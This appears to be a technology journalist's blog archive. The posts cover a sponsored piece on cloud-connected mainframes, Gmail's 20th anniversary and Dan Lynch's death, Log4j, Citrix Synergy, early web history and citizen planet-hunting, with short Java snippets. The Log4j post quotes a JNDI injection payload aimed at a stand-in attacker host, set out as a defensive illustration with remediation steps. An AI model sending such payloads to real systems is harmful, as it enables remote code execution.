The Cloud-Ready Mainframe: Extending Your Data’s Reach and Impact

(This post is sponsored by VirtualZ Computing)

Some of the largest enterprises are finding new uses for their mainframes. And instead of competing with cloud and distributed computing, the mainframe has become a complementary asset that adds new productivity and a level of cost-effective scale to existing data and applications. 

While the cloud does quite well at elastically scaling up resources as application and data demands increase, the mainframe is purpose-built for the largest-scale digital applications. More importantly, it has kept pace as those demands have mushroomed over its 60-year reign, which is why so many large enterprises continue to use it. Having mainframes as part of a distributed enterprise application portfolio could be a significant and savvy move, and a reason for their role and importance to grow in the future.

Estimates suggest that there are about 10,000 mainframes in use today, which may not seem like many until you consider that they can be found in more than two-thirds of the Fortune 500. In the past, mainframes used proprietary protocols such as Systems Network Architecture, ran applications written in now-obsolete coding languages such as COBOL, and ran on custom CPU hardware. Those days are behind us: the latest mainframes run Linux and TCP/IP across hundreds of multi-core microprocessors.

But even speaking cloud-friendly Linux and TCP/IP doesn’t remove two main problems for mainframe-based data. First, many mainframe COBOL apps are islands unto themselves, isolated from the end-user Java experience, coding pipelines and programming tools. Breaking that isolation usually means an expensive effort to convert and audit the code.

A second issue has to do with data lakes and data warehouses. These have become popular ways for businesses to spot trends quickly and adjust IT solutions as their customers’ data needs evolve. But the underlying applications typically require near real-time access to existing mainframe data, such as financial transactions, sales and inventory levels, or airline reservations. At the core of any lake or warehouse is a series of extract, transform and load (ETL) operations that move data back and forth between the mainframe and the cloud. These operations only capture the data as it exists at a particular moment in time, and they require custom programming to accomplish.
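To make that concrete, here is a minimal sketch of what one of those point-in-time extract steps might look like, assuming a JDBC-accessible Db2 for z/OS source; the connection string, credentials, and table and column names are hypothetical placeholders, not any particular customer’s setup.

```java
import java.io.FileWriter;
import java.sql.Connection;
import java.sql.DriverManager;
import java.sql.ResultSet;
import java.sql.Statement;

// Minimal sketch of a nightly point-in-time "extract" step. The Db2 URL,
// credentials, and table/column names are hypothetical placeholders.
public class NightlyExtract {
    public static void main(String[] args) throws Exception {
        String url = "jdbc:db2://mainframe.example.com:446/PRODDB";
        try (Connection conn = DriverManager.getConnection(url, "batchuser", "secret");
             Statement stmt = conn.createStatement();
             ResultSet rs = stmt.executeQuery(
                 "SELECT ACCOUNT_ID, TXN_AMOUNT, TXN_TS FROM LEDGER.TRANSACTIONS " +
                 "WHERE TXN_TS > CURRENT TIMESTAMP - 1 DAY");   // yesterday's rows only
             FileWriter out = new FileWriter("transactions.csv")) {
            while (rs.next()) {
                // The "transform" step is often just reshaping rows into a flat file.
                out.write(rs.getString("ACCOUNT_ID") + "," +
                          rs.getBigDecimal("TXN_AMOUNT") + "," +
                          rs.getTimestamp("TXN_TS") + "\n");
            }
        }
        // A separate "load" job then bulk-imports transactions.csv into the warehouse.
        // By the time it lands there, the data is already a snapshot of the past.
    }
}
```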

What was needed was an additional step to make mainframes easier for IT managers to integrate with other cloud and distributed computing resources, and that meant a new set of software tools. The first step came from initiatives such as IBM’s z/OS Connect, which enabled distributed applications to access mainframe data. But it continued the mindset of a custom programming effort and didn’t really provide direct access for distributed applications.

To fully realize the vision of mainframe data as an equal cloud node required a major makeover, thanks to companies such as VirtualZ Computing. They latched on to the OpenAPI effort, which was previously part of the cloud and distributed world. Using this protocol, they created connectors that make it easier for vendors to access real-time data and integrate with a variety of distributed data products, such as MuleSoft, Tableau, TIBCO, Dell Boomi, Microsoft Power BI, Snowflake and Salesforce. Instead of complex, single-use data transformations, VirtualZ enables real-time read and write access to business applications. This means the mainframe can now become a full-fledged and efficient cloud computer.
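For a rough sense of what this looks like from the distributed side, here is a hedged sketch of a cloud application reading live mainframe data through a REST endpoint described by an OpenAPI specification; the host, path, and token are placeholders for illustration, not VirtualZ’s actual interface.

```java
import java.net.URI;
import java.net.http.HttpClient;
import java.net.http.HttpRequest;
import java.net.http.HttpResponse;

// Hypothetical example: a cloud-side application reading a live mainframe
// record through an OpenAPI-described REST endpoint. Host, path, and token
// are placeholders, not an actual product interface.
public class LiveInventoryCheck {
    public static void main(String[] args) throws Exception {
        HttpClient client = HttpClient.newHttpClient();
        HttpRequest request = HttpRequest.newBuilder()
                .uri(URI.create("https://connector.example.com/api/v1/inventory/SKU-12345"))
                .header("Authorization", "Bearer <access-token>")
                .header("Accept", "application/json")
                .GET()
                .build();

        // The response reflects the record as it exists on the mainframe right now,
        // rather than a copy produced by last night's batch extract.
        HttpResponse<String> response =
                client.send(request, HttpResponse.BodyHandlers.ofString());
        System.out.println(response.statusCode() + ": " + response.body());
    }
}
```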

VirtualZ CEO Jeanne Glass says, “Because data stays securely and safely on the mainframe, it is a single source of truth for the customer and still leverages existing mainframe security protocols.” There isn’t any need to convert COBOL code, and no need to do any cumbersome data transformations and extractions.

The net effect is an overall cost reduction, since an enterprise isn’t paying for expensive, high-resource cloud instances. The business becomes more agile, since data stays in one place and is available at the moment it is needed by a particular application. This approach extends the effective life of a mainframe without costly data or process conversions, while reducing risk and complexity. It also helps solve complex data access and report migration challenges efficiently and at scale, which is key for organizations transitioning to hybrid cloud architectures. The ultimate result is a hybrid architecture that includes the mainframe itself.

Gmail at 20, RIP Dan Lynch

Writing a computer-themed column appearing today can be a tough assignment. But I want to assure you that first, it isn’t any net-fueled prank and second, that it is actually written from start to end by me and not by some algorithm. More on that in a moment.

Today marks the 20th anniversary of Gmail’s creation. Google was playing with fire when it first announced the service in this press release, and the initial reaction was disbelief because of the date. Back then, it was an amazing feat to offer a gigabyte of storage (since expanded to 15 GB for the free tier) and the ability to search your entire email corpus. This was when many email services had capacity limits of 4MB or so, which seem laughable by today’s standards. Now there are more than 1.5 billion users, including myself. (I actually host my domain with Google, which was free until recently.) Here is a screen grab of what it looked like back then.

But there is another and sadder moment that I want to mention.

Over the weekend we lost one of the Great Ones, Dan Lynch, who was the founder of the Interop trade show. He was one of the prime movers behind the commercialization of the internet, back when we all used the capital “I” as befitting its status in society.

I was involved in the show in numerous ways: as a tech journalist (and editor-in-chief of what would become the leading computer networking business publication), as an editorial consultant to help guide the conference program, and as a speaker and lecturer. At its height, Dan put on five shows yearly around the world, and I spoke at many of them. Here is an interesting historical plot of when and where the shows took place.

You can read more about Dan’s accomplishments in this NYT obit written by Katie Hafner. He was 82; the cause was kidney failure.

One of the features of Interop was its ability to force vendors into improving their products in real time, during the several days that the show was running, with what eventually was called the Shownet. In the early days, TCP/IP was still very much an experimental set of protocols and had yet to become the global lingua franca that it is today. The Shownet was born out of the necessity to get better interoperability, hence the show’s name. It began with 300 vendors and eventually blossomed to attract tens of thousands of attendees. This year the show is back from its virtual hiatus and will be held in Tokyo this summer.

“The Shownet was also often the first place where many router or switch devices ever met a complex topology,” wrote Karl Auerbach, one of the many volunteer engineers who worked on it over the years. “Few saw the almost continuous efforts, done under Dan’s watch, between shows to design, pre-build (in ever larger warehouses), ship, deploy, operate, and then remove. The Shownet trained hundreds of electricians in the arts of network wiring over the years.”

I wanted to talk to Dan as part of an article that I am writing for the Internet Protocol Journal about the history and tenacity of the Shownet, but sadly we weren’t able to connect before his passing. He was truly a force of nature, a force that brought a lot of goodness to the world and changed it for the better. Many of us owe our careers, our knowledge of computing, and our human connections to Dan’s efforts.

So one final note. I came across this coda that explains “human-generated content” on a website by displaying one of three icons. I want to assure you that my website, newsletter, and any work that I produce is 100% written by me, that the people I quote are also actual carbon-based life forms, and no GPUs have been harmed or otherwise employed to produce this work product.

SiliconANGLE: The changing economics of open-source software

The world of open-source software is about to go through another tectonic change. But unlike earlier changes brought about by corporate acquisitions, this time it’s thanks to the growing series of tech layoffs. The layoffs will certainly shift the balance of power between large and small software vendors and between free and commercial software versions, and the role played by OSS in enterprise software applications could change as well.

In this post for SiliconANGLE, I talk about why these changes are important and what enterprise software managers should take away from the situation.


Infoworld: What app developers need to do now to fight Log4j exploits

Earlier this month, security researchers uncovered a series of major vulnerabilities in the Log4j Java software that is used in tens of thousands of web applications. The code is widely used across consumer and enterprise systems, in everything from Minecraft, Steam, and iCloud to Fortinet and Red Hat systems. One analyst estimates that millions of endpoints could be at risk.

There are at least four major vulnerabilities stemming from Log4j exploits. What is clear is that as an application developer, you have a lot of work to do to find, fix, and prevent Log4j issues in the near term, and a few things to worry about in the longer term.
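To make the risk concrete, here is a stripped-down illustration of the pattern behind the most serious flaw (CVE-2021-44228, better known as Log4Shell): on vulnerable Log4j 2 releases, logging a string an attacker controls can trigger a JNDI lookup. The remediation notes in the comments reflect the widely published guidance; the class and variable names themselves are just illustrative.

```java
import org.apache.logging.log4j.LogManager;
import org.apache.logging.log4j.Logger;

// Illustration of the Log4Shell pattern: on vulnerable Log4j 2 releases
// (2.0-beta9 through 2.14.1), message lookups are expanded, so logging a
// string an attacker controls can trigger an outbound JNDI/LDAP request.
public class LoginHandler {
    private static final Logger log = LogManager.getLogger(LoginHandler.class);

    void handleFailedLogin(String userAgent) {
        // If userAgent contains something like "${jndi:ldap://attacker.example/a}",
        // a vulnerable Log4j resolves the lookup and can end up loading remote code.
        log.error("Login failed, user agent: {}", userAgent);
    }
}
// Remediation: upgrade to Log4j 2.17.1 or later. Setting
// -Dlog4j2.formatMsgNoLookups=true or stripping JndiLookup.class from the
// classpath were interim mitigations, but only upgrading covers all the CVEs.
```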

You can read my analysis and suggested strategies in Infoworld here.

Avast blog: How will advertisers respond to Apple’s latest privacy changes?

Last week, we described the privacy changes happening within Apple’s iOS 14.5. Now, in this post, we’ll be presenting the advertiser’s perspective of the situation at hand. While advertisers may think the sky is falling, the full-on Chicken Little scenario might not be happening. The changes will make it harder – but not impossible – for advertisers to track users’ habits and target ads to their devices. And as I mention in my latest blog for Avast here, digital ad vendors need to learn new ways to target their campaigns. They have done it before, and hopefully the changes in iOS will be good for everyone, eventually.


Picking the right tech isn’t always about the specs

I have been working in tech for close to 40 years, yet it took me until this week to realize an important truth: we have too many choices and too much tech in our lives, both personal and work. So much of the challenge with tech is picking the right product, and then realizing afterwards the key limitations of our choice and its consequences. I guess I shouldn’t complain; after all, I have built a great career out of figuring this stuff out.

But it really is a duh! moment. I don’t know why it has taken me so long to come to this brilliant deduction. I am not complaining; it is nice to help others figure out how to make these choices. Almost every day I am either writing, researching or discussing tech choices for others. But like the shoemaker’s barefoot children, my own tech choices are often fraught with plenty of indecision, or worse yet, no decision. It is almost laughable.

I was on a phone call yesterday with a friend of mine who is as technical as they come: he helped create some of the Net’s early protocols. We were both commiserating about how quirky Webex is when trying to support a conference call with several hundred participants. Yes, Webex is fine for the actual video conference itself; the video and audio quality are both generally solid. But it is all the “soft” support that rests on the foibles of how we humans apply the tech: running the practice session before the call, notifying everyone about it, distributing the slide deck under discussion and so forth. These things require real work: explaining to the call’s organizers what to do and creating standards to make the call go smoothly. It isn’t the tech per se – it is how we apply it.

Let me draw a line from that discussion to an early moment in my career, when I worked in the bowels of the end-user IT support department of the Gigantic Insurance company in the early 1980s. We were buying PCs by the truckload, quite literally, to place on the desks of the several thousand IT staffers who until then had a telephone and, if they were lucky, a mainframe terminal. Of course, we were buying IBM PCs – there was no actual discussion, because back then that was the only choice for corporate America. Then Compaq came along and built something that IBM didn’t yet have: a “portable” PC. The reason for the quotes is that this thing was enormous. It weighed about 30 pounds and was an inch too big to fit in the overhead bins of most planes.

As soon as Compaq announced this unit (which sold for more than $5,000 back then), our executives were conflicted. Our IBM sales reps, who had invested many man-years in golf games with them, were trying to convince them to wait a year for IBM’s own portable PC to come to market. But once we got our hands on an IBM prototype, we could see that the Compaq was the superior machine. First, it was already available. It was also lighter and smaller, ran the same apps, and had a compatible version of DOS. We gave Compaq our recommendation and started buying them in droves. That was the beginning of what became known as the clone wars, unleashing a new era of technology choices for the corporate world. By the time IBM finally came out with its portable, Compaq had already put hard drives in its models, so it stayed ahead of IBM on features.

My point in recounting this quaint history lesson is that one thing hasn’t changed in nearly 40 years: tech reviews tend to focus on the wrong things, which is why we get frustrated when we finally decide on a piece of tech and then have to live with the consequences.

Some of our choices seem easy: who wants to pay a thousand bucks for a stand to set your monitor on? Of course, some things haven’t changed: the new Macs also sell for more than $5,000. That is progress, I guess.

My moral for today: look beyond the specs and understand how you are eventually going to use the intended tech. You may choose differently.

Blogger in residence at Citrix Synergy conference

This is my second time at the major Citrix annual conference, and I will be posting regularly during and after the show. My first piece can be found here and covers what I heard from a new management team at Citrix. They introduced their vision for the future of Citrix, and the future of work. “Work is no longer a place you go, it is an activity and digital natives expect their workplace to be virtual and follow them wherever they go. They are pushing the boundaries of how they work,” said Citrix CEO Kirill Tatarinov.

My second post is on Windows Continuum, which puts Windows 10 functionality on a range of different and non-traditional IT devices, such as the giant Surface Hub display, Xbox consoles, and Windows Phones. If you review the information provided by Microsoft, you might get the wrong idea of how useful this could be for the enterprise; in my post I discuss what Citrix is doing to embrace and extend this interface.

My next piece looks at several infosec products on display, including solutions from Bitdefender, Kaspersky, IGEL and Veridium. Security has been a big focus of the show, and I am glad to see these vendors here supporting Citrix products.

Speaking of security, one of the more important product announcements this week at Synergy was that Secure Browser Essentials will be available later this year on the Azure Marketplace. This is actually the second secure browsing product that Citrix has announced, and you can read my analysis of how the two differ and what to consider if you are looking for such a product.

And here is a story about the Okada Manila Resort, which was featured as a semi-finalist for the innovation award at the show. It was built on a huge site and is similar to the resort-style properties found in Las Vegas and Macau. It will house 2,300 guest rooms when it is fully built and have 10,000 employees. At least 100 of them, plus contractors, work full-time in the IT department, supporting 2,000 endpoints and numerous physical and virtual servers placed in two separate datacenters on the property. I spoke to Scott, the resort’s IT manager, about how he built his infrastructure and some of the hard decisions he had to make.

At his Synergy keynote, Citrix CEO Kirill Tatarinov mentioned that IT “needs a software defined perimeter (SDP) that helps us manage our mission critical assets and enable people to work the way they want to.” The concept is not a new one, having been around for several years. An SDP replaces the traditional network perimeter — usually thought of as a firewall. I talk about what an SDP is and what Citrix is doing here. 

Finally, this piece is about the Red Bull Racing team and how they are using various Citrix tech to power their infrastructure. Few businesses create a completely different product every couple of weeks, let alone take their product team on the road and set up a new IT system on the fly. Yet this is what the team at Red Bull Racing does each and every day.

Looking back at 25 years of the world wide web

This week the web has celebrated yet another of its 25th birthdays, and boy does that make me feel old. Like many other great inventions, there are several key dates along the way in its origin story. For example, here is a copy of the original email that Tim Berners-Lee sent back in August 1991, along with an explanation of the context of that message. Steven Vaughan-Nichols has a nice walk down memory lane over at ZDNet here.

Back in 1995, I had some interesting thoughts about those early days of the web as well. This column draws on one that I wrote then, with some current day updates.

I’ve often said that web technology is a lot like radio in the 1920s: station owners are not too sure who is really listening but they are signing up advertisers like crazy, programmers are still feeling around for the best broadcast mechanisms, and standards are changing so fast that the technology barely works on the best of days. Movies, obviously, are the metaphor for Java, audio applets and other non-textual additions.

So far, I think the best metaphor for the web is that of a book: something that you’d like to have as a reference source, entertaining when you need it, portable (well, if you tote around a laptop), and so full of information that you would rather leave it on your shelf.

Back in 1995, I was reminded of the so-called “electronic books” that were a big deal at the time. One of my favorites then was a 1993 book/disk package called The Electronic Word by Richard Lanham, which, ironically, is about how computers have changed the face of written communications. The book is my favorite counter-example to on-line books. Lanham is an English professor at UCLA, and the book comes with a HyperCard stack that shows both the power of print and how unsatisfactory reading on the screen can be. Prof. Lanham takes you through some of the editing process in the HyperCard version, showing before-and-after passages that were included in the print version.

But we don’t all want to read stuff on-line, especially dry academic works that contain transcripts of speeches. That is an important design point for webmasters to consider. Many websites are full reference works, and even if we had faster connections to the Internet, we still wouldn’t want to view all that stuff on-screen. Send me a book, or some paper, instead.

Speaking of eliminating paper, in my column I took a look at what Byte magazine was trying to do with its Virtual Press Room. (The link will take you to a 1996 archive copy, where you can see the beginnings of what others would do later on. As with so many other things, Byte was far ahead of the curve.)

Byte back then had the intriguing idea of having vendors send their press releases electronically, so editors wouldn’t have to plow through printed ones. But how about going a step further in the interest of saving trees: sending in both links to the vendor’s own website and whatever keywords are needed? Years later, I am still asking vendors for key information from their press releases. Some things don’t change, no matter what the technology.

What separates good books from bad is good indexing and a great table of contents. We use both to find our way around a book: the index more for reference, the table of contents more for determining interest and where to enter its pages. So how many websites have you visited lately that have either one, let alone have done a reasonable job on both? Not many back in 1995, and not many today, sadly. Some things don’t change.

Today we almost take it for granted that numerous enterprise software products have web front-end interfaces, not to mention all the SaaS products that speak native HTML. But back in the mid 1990s, vendors were still struggling with the web interface and trying it on. Cisco had its UniverCD (shown here), which was part CD-ROM and part website. The CD came with a copy of the Mosaic browser so you could look up the latest router firmware and download it online, and when I saw this back in the day I said it was a brilliant use of the two interfaces. Novell (ah, remember them?) had its Market Messenger CD ROM, which also combined the two. There were lots of other book/CD combo packages back then, including Frontier’s Cybersearch product. It had the entire Lycos (a precursor of Google) catalog on CD along with browser and on-ramp tools. Imagine putting the entire index of the Internet on a single CD. Of course, it would be instantly out of date but you can’t fault them for trying.

Vendors combined CDs with the web because bandwidth was precious, and sending images down a dial-up line was painful. (Remember that the first web browser shown at the top of this column was text-only.) If you could offload those images onto a CD, you could have the best of both worlds. At the time, I said that if we wanted to watch movies, we would go to Blockbuster and rent one. Remember Blockbuster? Now we get annoyed if our favorite flick isn’t immediately available to stream online.

Yes, the web has come a long way since its invention, no matter which date you choose to celebrate. It has been an amazing time to be around and watch its progress, and I count myself lucky that I can use its technology to preserve many of the things that others and I have written about it.

Fast Track blog: The benefits of being in a hackathon

With the number of coding-for-cash contests, popularly called hackathons, exploding, now might be the time to consider spending part of your weekend or an evening participating, even if you aren’t a total coder. Indeed, if you are one of the growing number of citizen developers, you might be more valuable to your team than someone who can spew out tons of Ruby or Perl scripts on demand. I spoke to several hackathon participants at the QuickBase EMPOWER user conference last month to get their perspective. You can read my post in QuickBase’s Fast Track blog today.

Using citizen science to hunt for new planets

When I was growing up, one of my childhood heroes was Clyde Tombaugh, the astronomer who discovered Pluto. We have since demoted Pluto from its planetary status, but it was still a pretty cool thing to be someone who discovered a planet-like object. Today, you have the opportunity to find a new planet yourself, and you don’t even need a telescope or lonely, cold nights at some mountaintop observatory. It is all thanks to an aging NASA spacecraft and how the Internet has transformed the role of public and private science research.

Let’s start at the beginning, seven years ago, when the Kepler spacecraft was launched. It was designed to take pictures of a very small patch of space that had the most likely conditions for finding planets orbiting far-away stars. (See above.) By closely scrutinizing this star field, the project managers hoped to find dips in the light emitted by stars as planets passed in front of them. It is a time-tested observational approach whose roots go back to Galileo tracking Jupiter’s moons in 1610. When you think about the great distances involved, it is pretty amazing that we have the technology to do this.

Since its launch, key parts of the spacecraft have failed, but researchers have figured out how to keep it running, using the pressure of sunlight to keep its cameras properly aligned. As a result, Kepler has been collecting massive amounts of data and faithfully downloading the images over the years, and more than 1,000 Earth-class (or M-class, from Star Trek) planets have already been identified. There are probably billions more out there.

NASA has extended Kepler’s mission as long as it can, and part of that extension was to establish an archive of the Kepler data that anyone can examine. This effort, called Planethunters.org, is where the search for planets gets interesting. NASA and various other researchers, notably from Chicago’s Adler Planetarium and Yale University, have enlisted hundreds of thousands of volunteers from around the world to look for more planets. You don’t need a physics degree, a sophisticated computer, or any Big Data algorithms. All you need is a keen mind, sharp eyes to pore over the data, and the motivation to try to spot a sequence that would indicate a potential planetary object.
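To get a feel for what “spotting a sequence” means, here is a toy sketch (mine, not NASA’s actual pipeline) of the kind of brightness-dip check an automated detector performs on a star’s light curve; the flux values and threshold are invented for illustration.

```java
// Toy sketch of automated transit detection: flag stretches where a star's
// measured brightness (flux) dips noticeably below its average. Real pipelines
// are far more sophisticated; the data and threshold here are invented.
public class TransitDipFinder {
    public static void main(String[] args) {
        double[] flux = {1.00, 1.01, 0.99, 1.00, 0.97, 0.96, 0.97, 1.00, 1.01, 0.99};

        // Baseline brightness: a simple mean over the whole series.
        double mean = 0;
        for (double f : flux) mean += f;
        mean /= flux.length;

        // Flag any run of consecutive samples more than 2% below the baseline.
        // (Real transits are usually far shallower, often a fraction of a percent.)
        double threshold = 0.98 * mean;
        int runStart = -1;
        for (int i = 0; i <= flux.length; i++) {
            boolean dip = i < flux.length && flux[i] < threshold;
            if (dip && runStart < 0) runStart = i;
            if (!dip && runStart >= 0) {
                System.out.println("Possible transit: samples " + runStart + " to " + (i - 1));
                runStart = -1;
            }
        }
        // A shallow or irregular dip never clears a fixed threshold like this one,
        // which is exactly the kind of signal sharp-eyed volunteers can still catch.
    }
}
```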

What is fascinating to me is how this crowd-based effort has been complementary to what has already happened with the Kepler database. NASA admits that it needs help from humans. As they state online, “We think there will be planets which can only be found via the innate human ability for pattern recognition. At Planet Hunters we are enlisting the public’s help to inspect the Kepler [data] and find these planets missed by automated detection algorithms.”   

Think about that for a moment. We can harness the seemingly infinite computing power available in the cloud, but it isn’t enough. We still need carbon-based eyeballs to figure this stuff out.

Planet Hunters is just one of several projects that are hosted on Zooniverse.org, a site devoted to dozens of crowdsourced “citizen science” efforts that span the gamut of research. Think of what Amazon’s Mechanical Turk does by parcelling out pieces of data that humans classify and interpret. But instead of helping some corporation you are working together on a research project. And it isn’t just science research: there is a project to help transcribe notes from Shakespeare’s contemporaries, another one to explore WWI diaries from soldiers, and one to identify animals captured by webcams in Gorongosa National Park in Mozambique. Many of the most interesting discoveries from these projects have come from discussions between volunteers and researchers. That is another notable aspect: in the past, you needed at least a PhD or some kind of academic street cred to get involved with this level of research. Now anyone with a web browser can join in. Thousands have signed up.

Finally, the Zooniverse efforts are delivering another unexpected benefit: participants are doing more than looking for the proverbial needle in the haystack. They are learning about science by doing actual science research. It takes something dry and academic and makes it come alive. And the appeal isn’t just to adults, but to kids too: one blog post on the site showed how nine-year-old Czech kids got involved in one project. That to me is probably the best reason to praise the Zooniverse efforts.

So far, the Planet Hunters are actually finding planets: more than a dozen scientific papers have already been published, thanks to these volunteers around the world on the lookout. I wish I could have had this kind of access back when I was a kid, but I also have no doubt that Tombaugh would be among these searchers, had he lived to see this all happening.